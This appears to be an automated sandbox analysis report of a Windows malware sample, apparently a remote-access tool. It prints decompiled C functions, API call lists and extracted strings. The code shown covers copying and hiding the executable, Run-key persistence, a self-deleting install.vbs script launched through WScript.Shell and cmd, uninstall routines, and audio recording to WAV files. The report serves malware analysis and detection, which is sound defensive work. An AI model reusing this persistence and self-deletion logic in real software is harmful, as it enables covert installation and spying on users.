                                    0x006db30c
                                    0x006db314
                                    0x006db31c
                                    0x006db324
                                    0x006db329
                                    0x006db32b
                                    0x006db335
                                    0x006db335
                                    0x006db348
                                    0x006db34d
                                    0x006db34f
                                    0x006db374
                                    0x006db37c
                                    0x006db384
                                    0x006db384
                                    0x006db399
                                    0x006db3d8
                                    0x006db3e0
                                    0x006db3e8
                                    0x006db3f0
                                    0x006db3fb
                                    0x006db406
                                    0x006db413
                                    0x006db41c
                                    0x006db425
                                    0x006db443
                                    0x006db463
                                    0x006db463
                                    0x006db46c
                                    0x006db474
                                    0x006db487

                                    APIs
                                      • Part of subcall function 006E015B: TerminateProcess.KERNEL32(00000000,?,006DAD95), ref: 006E016B
                                      • Part of subcall function 006E015B: WaitForSingleObject.KERNEL32(000000FF,?,006DAD95), ref: 006E017E
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 006DB1DB
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 006DB1EE
                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 006DB206
                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 006DB234
                                      • Part of subcall function 006D9D73: TerminateThread.KERNEL32(006D884B,00000000,?,006DB101), ref: 006D9D82
                                      • Part of subcall function 006D9D73: UnhookWindowsHookEx.USER32(00000000), ref: 006D9D92
                                      • Part of subcall function 006D9D73: TerminateThread.KERNEL32(Function_00008830,00000000,?,006DB101), ref: 006D9DA4
                                      • Part of subcall function 006E7947: CreateFileW.KERNEL32(i]m,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,006E7A71,00000000,00000000), ref: 006E7986
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,0072F724,0072F724,00000000), ref: 006DB457
                                    • ExitProcess.KERNEL32 ref: 006DB463
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                    • API String ID: 1861856835-1536747724
                                    • Opcode ID: 1eb56fd5c4c95b228a5b7114856cbfe61e6f47163575f4218dd2430affa60ca9
                                    • Instruction ID: 74cc0979d552f5bc60fd307b46d89ef947ba62f41a303b403a969d7ff1fa25f1
                                    • Opcode Fuzzy Hash: 1eb56fd5c4c95b228a5b7114856cbfe61e6f47163575f4218dd2430affa60ca9
                                    • Instruction Fuzzy Hash: 47916E71E141586ADB55F7A0ECA6DEE776BAF51300F00002FF806AB392EF641E46C799
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E69CC, Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 185synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 86%
                                    			E006E69CC(void* __ecx, void* __edx, char _a4) {
				char _v24;
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t25;
				void* _t28;
				void* _t43;
				void* _t60;
				void* _t63;
				void* _t67;
				CHAR* _t89;
				void* _t109;
				CHAR* _t110;
				void* _t111;
				void* _t114;
				void* _t118;

				_t103 = __edx;
				_t67 = __ecx;
				_t109 = __edx;
				if(E006E6C12( &_a4, __ecx, __ecx) == 0xffffffff) {
					_t63 = E006D1EEB( &_a4);
					_t103 = 0x30;
					E006D1EFA( &_a4, 0x30, _t111, E006E805B( &_v28, 0x30, _t63));
					E006D1EF0();
				}
				_t25 = E006D2489();
				_t120 = _t25;
				if(_t25 == 0) {
					__eflags = PathFileExistsW(E006D1EEB( &_a4));
					if(__eflags != 0) {
						goto L4;
					} else {
						E006D2084(_t67, _t114 - 0x18, 0x72f6bc);
						_push(0xa8);
						E006D4AA4(_t67, 0x73ca18, _t103, __eflags);
					}
				} else {
					_t60 = E006D1EEB( &_a4);
					_t118 = _t114 - 0x18;
					E006D20EC(_t67, _t118, _t103, _t120, _t109);
					E006E7A4E(_t60);
					_t114 = _t118 + 0x18;
					L4:
					_t28 = E006E72DA( &_v124, _t67);
					_t108 = E006D3030( &_v28, E006D30A6(_t67,  &_v76, E006D9E69( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
					E006D30A6(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
					E006D1EF0();
					E006D1EF0();
					E006D1EF0();
					E006D1EF0();
					mciSendStringW(E006D1EEB( &_v52), 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					_t115 = _t114 - 0x18;
					E006D2084(0, _t114 - 0x18, 0x72f6bc);
					_push(0xa9);
					E006D4AA4(0, 0x73ca18, _t32, 0);
					_t43 = CreateEventA(0, 1, 0, 0);
					while(1) {
						L5:
						 *0x73bea8 = _t43;
						while(1) {
							_t122 = _t43;
							if(_t43 == 0) {
								break;
							}
							__eflags =  *0x73bea6; // 0x0
							if(__eflags != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x73bea6 = 0;
							}
							__eflags =  *0x73bea5; // 0x0
							if(__eflags != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x73bea5 = 0;
							}
							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
							_t108 =  &_v24;
							_t110 = "stopped";
							_t89 = 0;
							while(1) {
								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
									break;
								}
								_t89 = _t89 + 1;
								__eflags = _t89 - 8;
								if(_t89 != 8) {
									continue;
								} else {
									SetEvent( *0x73bea8);
								}
								break;
							}
							__eflags = WaitForSingleObject( *0x73bea8, 0x1f4);
							if(__eflags != 0) {
								_t43 =  *0x73bea8; // 0x0
							} else {
								CloseHandle( *0x73bea8);
								_t43 = 0;
								goto L5;
							}
						}
						mciSendStringA("stop audio", 0, 0, 0);
						mciSendStringA("close audio", 0, 0, 0);
						E006D2084(0, _t115 - 0x18, 0x72f6bc);
						_push(0xaa);
						E006D4AA4(0, 0x73ca18, _t108, _t122);
						E006D1EF0();
						goto L21;
					}
				}
				L21:
				return E006D1EF0();
			}
























                                    0x006e69cc
                                    0x006e69d6
                                    0x006e69d8
                                    0x006e69e6
                                    0x006e69eb
                                    0x006e69f1
                                    0x006e6a00
                                    0x006e6a08
                                    0x006e6a08
                                    0x006e6a0f
                                    0x006e6a17
                                    0x006e6a19
                                    0x006e6b06
                                    0x006e6b08
                                    0x00000000
                                    0x006e6b0e
                                    0x006e6b18
                                    0x006e6b1d
                                    0x006e6b27
                                    0x006e6b27
                                    0x006e6a1f
                                    0x006e6a1f
                                    0x006e6a24
                                    0x006e6a2c
                                    0x006e6a33
                                    0x006e6a38
                                    0x006e6a3b
                                    0x006e6a45
                                    0x006e6a78
                                    0x006e6a7d
                                    0x006e6a86
                                    0x006e6a8e
                                    0x006e6a96
                                    0x006e6a9e
                                    0x006e6ab1
                                    0x006e6ac5
                                    0x006e6ac7
                                    0x006e6ad1
                                    0x006e6ad6
                                    0x006e6ae0
                                    0x006e6aea
                                    0x006e6af0
                                    0x006e6af0
                                    0x006e6af0
                                    0x006e6bc1
                                    0x006e6bc1
                                    0x006e6bc3
                                    0x00000000
                                    0x00000000
                                    0x006e6b31
                                    0x006e6b37
                                    0x006e6b41
                                    0x006e6b43
                                    0x006e6b43
                                    0x006e6b49
                                    0x006e6b4f
                                    0x006e6b59
                                    0x006e6b5b
                                    0x006e6b5b
                                    0x006e6b6d
                                    0x006e6b6f
                                    0x006e6b72
                                    0x006e6b77
                                    0x006e6b79
                                    0x006e6b7d
                                    0x006e6b80
                                    0x00000000
                                    0x00000000
                                    0x006e6b82
                                    0x006e6b83
                                    0x006e6b86
                                    0x00000000
                                    0x006e6b88
                                    0x006e6b8e
                                    0x006e6b8e
                                    0x00000000
                                    0x006e6b86
                                    0x006e6ba5
                                    0x006e6ba7
                                    0x006e6bbc
                                    0x006e6ba9
                                    0x006e6baf
                                    0x006e6bb5
                                    0x00000000
                                    0x006e6bb5
                                    0x006e6ba7
                                    0x006e6bd1
                                    0x006e6bdb
                                    0x006e6be7
                                    0x006e6bec
                                    0x006e6bf6
                                    0x006e6bfe
                                    0x00000000
                                    0x006e6bfe
                                    0x006e6af0
                                    0x006e6c03
                                    0x006e6c11

                                    APIs
                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 006E6AB1
                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 006E6AC5
                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,0072F6BC), ref: 006E6AEA
                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,0073C238), ref: 006E6B00
                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 006E6B41
                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 006E6B59
                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 006E6B6D
                                    • SetEvent.KERNEL32 ref: 006E6B8E
                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 006E6B9F
                                    • CloseHandle.KERNEL32 ref: 006E6BAF
                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 006E6BD1
                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 006E6BDB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                    • API String ID: 738084811-1354618412
                                    • Opcode ID: 17c2f6e43e8d696a918ba29b9aef4913c9246ac903ae0f8a77ffe83b934554ba
                                    • Instruction ID: 9946a59acd654f79882b29a84dcee82ae91c1de86ec1dc2749b1e77e07697eee
                                    • Opcode Fuzzy Hash: 17c2f6e43e8d696a918ba29b9aef4913c9246ac903ae0f8a77ffe83b934554ba
                                    • Instruction Fuzzy Hash: 9751D671A402497FE714F7B8DC92CBF3B6FDF51384B00812EF502A6292DE644E4687A9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D1A64, Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 155fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 95%
                                    			E006D1A64(WCHAR* __ecx, signed int __edx) {
				long _v8;
				void _v12;
				void _v16;
				void _v20;
				void _v24;
				void _v28;
				void _v32;
				signed int _t36;
				void** _t75;
				signed int _t80;
				void* _t81;
				signed int _t83;

				_t75 = __edx;
				_t80 =  *0x73ba9a & 0x0000ffff;
				_t83 = ( *0x73baa6 & 0x0000ffff) * _t80;
				_v20 = 1;
				_v16 = 0x10;
				_v24 = _t83 *  *0x73ba9c >> 3;
				asm("cdq");
				_v28 = _t83 + (__edx & 0x00000007) >> 3;
				_t36 =  *(__edx + 4) * _t80;
				_v32 = _t36;
				_v12 = _t36 + 0x24;
				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t81 != 0xffffffff) {
					WriteFile(_t81, "RIFF", 4,  &_v8, 0);
					WriteFile(_t81,  &_v12, 4,  &_v8, 0);
					WriteFile(_t81, "WAVE", 4,  &_v8, 0);
					WriteFile(_t81, "fmt ", 4,  &_v8, 0);
					WriteFile(_t81,  &_v16, 4,  &_v8, 0);
					WriteFile(_t81,  &_v20, 2,  &_v8, 0);
					WriteFile(_t81, 0x73ba9a, 2,  &_v8, 0);
					WriteFile(_t81, 0x73ba9c, 4,  &_v8, 0);
					WriteFile(_t81,  &_v24, 4,  &_v8, 0);
					WriteFile(_t81,  &_v28, 2,  &_v8, 0);
					WriteFile(_t81, 0x73baa6, 2,  &_v8, 0);
					WriteFile(_t81, "data", 4,  &_v8, 0);
					WriteFile(_t81,  &_v32, 4,  &_v8, 0);
					WriteFile(_t81,  *_t75, _t75[1],  &_v8, 0);
					CloseHandle(_t81);
					return 1;
				}
				return 0;
			}















                                    0x006d1a73
                                    0x006d1a76
                                    0x006d1a7d
                                    0x006d1a80
                                    0x006d1a87
                                    0x006d1a9a
                                    0x006d1a9f
                                    0x006d1ab0
                                    0x006d1ab8
                                    0x006d1ac3
                                    0x006d1ac9
                                    0x006d1ad2
                                    0x006d1ad7
                                    0x006d1af3
                                    0x006d1b02
                                    0x006d1b12
                                    0x006d1b22
                                    0x006d1b31
                                    0x006d1b40
                                    0x006d1b50
                                    0x006d1b60
                                    0x006d1b6f
                                    0x006d1b7e
                                    0x006d1b8e
                                    0x006d1b9e
                                    0x006d1bad
                                    0x006d1bbb
                                    0x006d1bbe
                                    0x00000000
                                    0x006d1bc4
                                    0x00000000

                                    APIs
                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1ACC
                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1AF3
                                    • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B02
                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B12
                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B22
                                    • WriteFile.KERNEL32(00000000,00000010,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B31
                                    • WriteFile.KERNEL32(00000000,00000001,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B40
                                    • WriteFile.KERNEL32(00000000,0073BA9A,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B50
                                    • WriteFile.KERNEL32(00000000,0073BA9C,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B60
                                    • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B6F
                                    • WriteFile.KERNEL32(00000000,?,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B7E
                                    • WriteFile.KERNEL32(00000000,0073BAA6,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B8E
                                    • WriteFile.KERNEL32(00000000,data,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1B9E
                                    • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 006D1BAD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$Write$Create
                                    • String ID: RIFF$WAVE$data$fmt
                                    • API String ID: 1602526932-4212202414
                                    • Opcode ID: 410a10c3014acdd53fbde371a90724c5feba3d1e9e554444b33e330895fd5139
                                    • Instruction ID: 7d48e5f8c6794f82428aa3601f3606a668a9fa91611bf266effa2af146d70c36
                                    • Opcode Fuzzy Hash: 410a10c3014acdd53fbde371a90724c5feba3d1e9e554444b33e330895fd5139
                                    • Instruction Fuzzy Hash: A041F8B5A4021CBAE710DA918D86FFFBABCEB45B50F404056F704EA1C1D7B45A05EBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DA987, Relevance: 30.1, APIs: 7, Strings: 10, Instructions: 324fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 95%
                                    			E006DA987(char __ecx, intOrPtr* __edx, WCHAR* _a4, char _a8, char _a12) {
				char _v9;
				int _v20;
				char _v44;
				char _v68;
				char _v92;
				char _v116;
				char _v140;
				char _v164;
				char _v188;
				char _v212;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				void* _t63;
				signed int _t67;
				signed int _t68;
				int _t70;
				void* _t79;
				void* _t91;
				void* _t92;
				int _t94;
				void* _t99;
				void* _t100;
				WCHAR* _t113;
				int _t115;
				intOrPtr _t118;
				WCHAR* _t123;
				int _t124;
				void* _t139;
				intOrPtr* _t152;
				int _t153;
				intOrPtr* _t207;
				int _t208;
				intOrPtr* _t235;
				void* _t236;
				void* _t239;
				void* _t249;
				void* _t250;
				intOrPtr _t254;
				void* _t257;
				void* _t259;
				intOrPtr* _t260;

				_t235 = __edx;
				_v9 = __ecx;
				_t260 = __edx;
				_v20 = 0;
				_t257 = __edx + 2;
				do {
					_t62 =  *_t235;
					_t235 = _t235 + 2;
				} while (_t62 != 0);
				_t236 = _t235 - _t257;
				_t268 = _t236;
				if(_t236 == 0) {
					_t143 = _a4;
					_t238 = __ecx;
					_t63 = E006E805B( &_v92, __ecx, _t143);
					_t259 = 0x73c500;
					E006D1EFA(0x73c500, _t238, _t260, _t63);
				} else {
					CreateDirectoryW(E006D1EEB(0x73c530), 0);
					_t143 = _a4;
					_t139 = E006D30A6(_t143,  &_v92, E006D7514( &_v44, 0x73c530, _t268, "\\"), 0x73c530, _t268, _t143);
					_t259 = 0x73c500;
					E006D1EFA(0x73c500, _t138, _t260, _t139);
					E006D1EF0();
				}
				E006D1EF0();
				_t152 = E006D1EEB(_t259);
				_t67 = 0x73bb08;
				while(1) {
					_t239 =  *_t67;
					if(_t239 !=  *_t152) {
						break;
					}
					if(_t239 == 0) {
						L10:
						_t153 = 0;
						_t68 = 0;
						L12:
						if(_t68 != 0) {
							_t70 = CopyFileW(0x73bb08, E006D1EEB(_t259), _t153);
							__eflags = _t70;
							if(_t70 != 0) {
								L23:
								E006DA896(0x73c4e8, E006D1EEB(0x73c4e8));
								__eflags = _a8 - 1;
								_pop(_t157);
								if(__eflags != 0) {
									L28:
									E006D30A6(_t143,  &_v92, E006D427F(_t143,  &_v68, E0070987F(_t143, _t157, __eflags, L"Temp")), _t259, __eflags, L"\\install.vbs");
									E006D1EF0();
									E006D427F(_t143,  &_v44, L"WScript.Sleep 1000\n");
									E006D766C(_t143,  &_v44, _t259, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
									__eflags = _a12 - 1;
									_t144 = "\n";
									if(__eflags == 0) {
										_t100 = E006D427F("\n",  &_v212, 0x73bb08);
										E006D3311(E006D30A6(_t144,  &_v68, E006D30A6(_t144,  &_v116, E006D3030( &_v140, E006D30A6(_t144,  &_v164, E006D427F("\n",  &_v188, L"fso.DeleteFile "), _t259, __eflags, "\""), _t100), _t259, __eflags, "\""), _t259, __eflags, _t144));
										E006D1EF0();
										E006D1EF0();
										E006D1EF0();
										E006D1EF0();
										E006D1EF0();
										E006D1EF0();
									}
									_t79 = E006D427F(_t144,  &_v116, L"\"\"\", 0");
									E006D3311(E006D30A6(_t144,  &_v212, E006D3030( &_v188, E006D4429(_t144,  &_v164, E006D427F(_t144,  &_v68, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), __eflags, _t259), _t79), _t259, __eflags, _t144));
									E006D1EF0();
									E006D1EF0();
									E006D1EF0();
									E006D1EF0();
									E006D1EF0();
									E006D766C(_t144,  &_v44, _t259, L"fso.DeleteFile(Wscript.ScriptFullName)");
									_t91 = E006D1EEB( &_v92);
									_t92 = E006D2489();
									_t94 = E006E7947(E006D1EEB( &_v44), _t92 + _t92, _t91, 0);
									__eflags = _t94;
									if(_t94 == 0) {
										L33:
										E006D1EF0();
										return E006D1EF0();
									} else {
										_t99 = ShellExecuteW(0, L"open", E006D1EEB( &_v92), 0x72f724, 0x72f724, 0);
										__eflags = _t99 - 0x20;
										if(_t99 <= 0x20) {
											goto L33;
										}
										ExitProcess(0);
									}
								}
								_t113 = E006D1EEB(_t259);
								_t143 = SetFileAttributesW;
								SetFileAttributesW(_t113, 7);
								_t249 = _t260 + 2;
								_t157 = 0;
								__eflags = 0;
								do {
									_t115 =  *_t260;
									_t260 = _t260 + 2;
									__eflags = _t115;
								} while (_t115 != 0);
								__eflags = _t260 - _t249;
								if(__eflags != 0) {
									_t157 = 0x73c530;
									SetFileAttributesW(E006D1EEB(0x73c530), 7);
								}
								goto L28;
							}
							__eflags = _v9 - 0x36;
							if(_v9 == 0x36) {
								goto L23;
							}
							_t207 = _t260;
							_t250 = _t207 + 2;
							do {
								_t118 =  *_t207;
								_t207 = _t207 + 2;
								__eflags = _t118 - _v20;
							} while (_t118 != _v20);
							_t208 = _t207 - _t250;
							__eflags = _t208;
							_push(_t143);
							if(_t208 == 0) {
								E006D1EFA(_t259, 0x36, _t260, E006E805B( &_v68, 0x36));
							} else {
								E006D1EFA(_t259, _t128, _t260, E006D30A6(_t143,  &_v140, E006D30A6(_t143,  &_v116, E006E805B( &_v68, 0x36, _t260), _t259, __eflags, "\\"), _t259, __eflags));
								E006D1EF0();
								E006D1EF0();
							}
							E006D1EF0();
							_t123 = E006D1EEB(_t259);
							_t143 = 0x73bb08;
							_t124 = CopyFileW(0x73bb08, _t123, 0);
							__eflags = _t124;
							if(_t124 != 0) {
								goto L23;
							} else {
								E006D9DC9(0x73bb08, _t259, 0x73bb08);
								return 0;
							}
						}
						E006DA896(0x73c4e8, E006D1EEB(0x73c4e8));
						return 1;
					}
					_t12 = _t67 + 2; // 0x0
					_t254 =  *_t12;
					if(_t254 !=  *((intOrPtr*)(_t152 + 2))) {
						break;
					}
					_t67 = _t67 + 4;
					_t152 = _t152 + 4;
					if(_t254 != 0) {
						continue;
					}
					goto L10;
				}
				asm("sbb eax, eax");
				_t68 = _t67 | 0x00000001;
				_t153 = 0;
				__eflags = 0;
				goto L12;
			}















































                                    0x006da987
                                    0x006da994
                                    0x006da998
                                    0x006da99a
                                    0x006da99d
                                    0x006da9a0
                                    0x006da9a0
                                    0x006da9a3
                                    0x006da9a6
                                    0x006da9ab
                                    0x006da9ab
                                    0x006da9b4
                                    0x006da9fe
                                    0x006daa01
                                    0x006daa07
                                    0x006daa0d
                                    0x006daa15
                                    0x006da9b6
                                    0x006da9bf
                                    0x006da9c5
                                    0x006da9de
                                    0x006da9e4
                                    0x006da9ec
                                    0x006da9f4
                                    0x006da9f9
                                    0x006daa1d
                                    0x006daa29
                                    0x006daa2b
                                    0x006daa30
                                    0x006daa30
                                    0x006daa36
                                    0x00000000
                                    0x00000000
                                    0x006daa3b
                                    0x006daa52
                                    0x006daa52
                                    0x006daa54
                                    0x006daa5f
                                    0x006daa61
                                    0x006daa8b
                                    0x006daa91
                                    0x006daa93
                                    0x006dab42
                                    0x006dab4e
                                    0x006dab53
                                    0x006dab58
                                    0x006dab59
                                    0x006dab92
                                    0x006dabb0
                                    0x006dabb9
                                    0x006dabc6
                                    0x006dabd3
                                    0x006dabd8
                                    0x006dabdc
                                    0x006dabe1
                                    0x006dabf9
                                    0x006dac46
                                    0x006dac4e
                                    0x006dac56
                                    0x006dac61
                                    0x006dac6c
                                    0x006dac77
                                    0x006dac82
                                    0x006dac82
                                    0x006dac90
                                    0x006dacd2
                                    0x006dacdd
                                    0x006dace8
                                    0x006dacf3
                                    0x006dacfb
                                    0x006dad03
                                    0x006dad10
                                    0x006dad1b
                                    0x006dad24
                                    0x006dad39
                                    0x006dad40
                                    0x006dad42
                                    0x006dad6d
                                    0x006dad70
                                    0x00000000
                                    0x006dad44
                                    0x006dad5b
                                    0x006dad61
                                    0x006dad64
                                    0x00000000
                                    0x00000000
                                    0x006dad67
                                    0x006dad67
                                    0x006dad42
                                    0x006dab5f
                                    0x006dab64
                                    0x006dab6b
                                    0x006dab6d
                                    0x006dab70
                                    0x006dab70
                                    0x006dab72
                                    0x006dab72
                                    0x006dab75
                                    0x006dab78
                                    0x006dab78
                                    0x006dab7d
                                    0x006dab81
                                    0x006dab85
                                    0x006dab90
                                    0x006dab90
                                    0x00000000
                                    0x006dab81
                                    0x006daa99
                                    0x006daa9d
                                    0x00000000
                                    0x00000000
                                    0x006daaa3
                                    0x006daaa5
                                    0x006daaa8
                                    0x006daaa8
                                    0x006daaab
                                    0x006daaae
                                    0x006daaae
                                    0x006daab4
                                    0x006daab4
                                    0x006daaba
                                    0x006daabe
                                    0x006dab0b
                                    0x006daac0
                                    0x006daae8
                                    0x006daaf3
                                    0x006daafb
                                    0x006daafb
                                    0x006dab13
                                    0x006dab1d
                                    0x006dab23
                                    0x006dab29
                                    0x006dab2f
                                    0x006dab31
                                    0x00000000
                                    0x006dab33
                                    0x006dab36
                                    0x00000000
                                    0x006dab3b
                                    0x006dab31
                                    0x006daa6f
                                    0x00000000
                                    0x006daa76
                                    0x006daa3d
                                    0x006daa3d
                                    0x006daa45
                                    0x00000000
                                    0x00000000
                                    0x006daa47
                                    0x006daa4a
                                    0x006daa50
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x006daa50
                                    0x006daa58
                                    0x006daa5a
                                    0x006daa5d
                                    0x006daa5d
                                    0x00000000

                                    APIs
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 006DA9BF
                                    • CopyFileW.KERNEL32(0073BB08,00000000,00000000,00000000), ref: 006DAA8B
                                    • CopyFileW.KERNEL32(0073BB08,00000000,00000000,00000000), ref: 006DAB29
                                      • Part of subcall function 006E805B: GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 006E81B2
                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 006DAB6B
                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 006DAB90
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,0072F724,0072F724,00000000), ref: 006DAD5B
                                    • ExitProcess.KERNEL32 ref: 006DAD67
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesCopy$CreateDirectoryExecuteExitLongNamePathProcessShell
                                    • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                    • API String ID: 4018752923-1662879639
                                    • Opcode ID: 03bdb243fba6adc90e74f06e3b70543210a8ca29304c545f913018ef525954e3
                                    • Instruction ID: 2cda71abb4b32994021f3be81205d85d9641ea19893da2353b45b40b7a1a65d0
                                    • Opcode Fuzzy Hash: 03bdb243fba6adc90e74f06e3b70543210a8ca29304c545f913018ef525954e3
                                    • Instruction Fuzzy Hash: 0DA16271E0411466CB68F7A4DC92EFE737BAF55300F44402FF806AA392EE745E46C66A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 007176AD, Relevance: 27.4, APIs: 18, Instructions: 419COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 87%
                                    			E007176AD(signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int* _t292;
				signed int _t298;
				signed int _t299;
				CHAR* _t300;
				signed int _t302;
				signed int _t303;
				WCHAR* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t307;
				signed int _t308;
				signed int _t310;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;
